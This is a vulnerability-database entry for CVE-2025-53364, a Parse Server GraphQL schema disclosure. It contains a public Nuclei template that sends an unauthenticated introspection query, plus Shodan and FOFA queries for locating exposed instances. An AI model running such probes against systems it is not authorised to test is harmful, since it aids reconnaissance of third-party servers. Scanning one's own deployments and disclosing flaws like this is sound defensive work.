CVE-2025-53364: Parse Server - GraphQL Schema Information Disclosure

日期: 2025-08-01 | 影响软件: Parse Server | POC: 已公开

漏洞描述

The Parse Server GraphQL API previously allowed public access to the GraphQL schema without requiring a session token or the master key. While schema introspection reveals only metadata and not actual data, this metadata can still expand the potential attack surface.

PoC代码[已公开]

id: CVE-2025-53364

info:
  name: Parse Server - GraphQL Schema Information Disclosure
  author: securitytaters
  severity: medium
  description: |
    The Parse Server GraphQL API previously allowed public access to the GraphQL schema without requiring a session token or the master key. While schema introspection reveals only metadata and not actual data, this metadata can still expand the potential attack surface.
  reference:
    - https://github.com/parse-community/parse-server/security/advisories/GHSA-48q3-prgv-gm4w
    - https://www.miggo.io/vulnerability-database/cve/CVE-2025-53364
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53364
  metadata:
    verified: true
    max-request: 1
    vendor: parseplatform
    product: parse-server
    shodan-query:
      - http.title:"parse server" || "parse-server"
      - http.title:"parse dashboard"
    fofa-query: title="parse dashboard"
  tags: cve,cve2025,parse,graphql,exposure

variables:
  appid: "{{appid}}"

http:
  - raw:
      - |
        POST /graphql HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-Parse-Application-Id: {{appid}}

        {"query":"{\n  __schema {\n    types {\n      name\n    }\n  }\n}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"data":{"__schema":{"types":[{"name":"Upload"},'

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a00463044022061b5906ae9e86ffbd960e0338c9166ce0bbd326359f06061fcb8dfb37df1b6c4022073150de9b1bcc445adf292b1fe13ddd843c00ef154b478e741418e048dfbee0f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐